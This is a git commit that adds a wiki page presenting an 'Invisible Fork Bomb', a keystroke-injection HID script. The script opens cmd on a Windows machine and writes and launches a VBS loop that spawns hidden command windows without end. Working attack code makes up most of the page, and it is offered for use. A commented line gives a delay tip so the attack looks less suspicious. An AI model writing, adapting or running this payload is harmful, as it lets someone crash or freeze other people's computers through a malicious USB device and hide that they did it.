Created Invisible Fork Bomb (markdown)

This commit is contained in:
BlueArduino20 2017-04-20 16:42:28 +02:00
parent 4f1b4f39e9
commit 22b227d4e9
1 changed files with 32 additions and 0 deletions

32
Invisible-Fork-Bomb.md Normal file
View File

@ -0,0 +1,32 @@
# Invisible Fork Bomb
The HID script creates a vbs that executes exponentially the software you want (Fork bomb).
# About...
Author: [BlueArduino20](https://github.com/BlueArduino20/)
Version 1.0
Repository: [https://github.com/BlueArduino20/Invisible_fork_bomb](https://github.com/BlueArduino20/Invisible_fork_bomb)
# Code
<pre><code>
GUI r
DELAY 500
STRING cmd
ENTER
DELAY 500
STRING copy con forkb.vbs
ENTER
STRING do
ENTER
STRING CreateObject("Wscript.Shell").Run "cmd", 0, False
ENTER
STRING loop
CTRL z
ENTER
DELAY 50
REM STRING ping localhost -n 10
REM You can uncomment this ^ to delay 10 seconds before starting the fork bomb. (By this way it's less suspicious)
STRING start forkb.vbs
ENTER
</pre></code>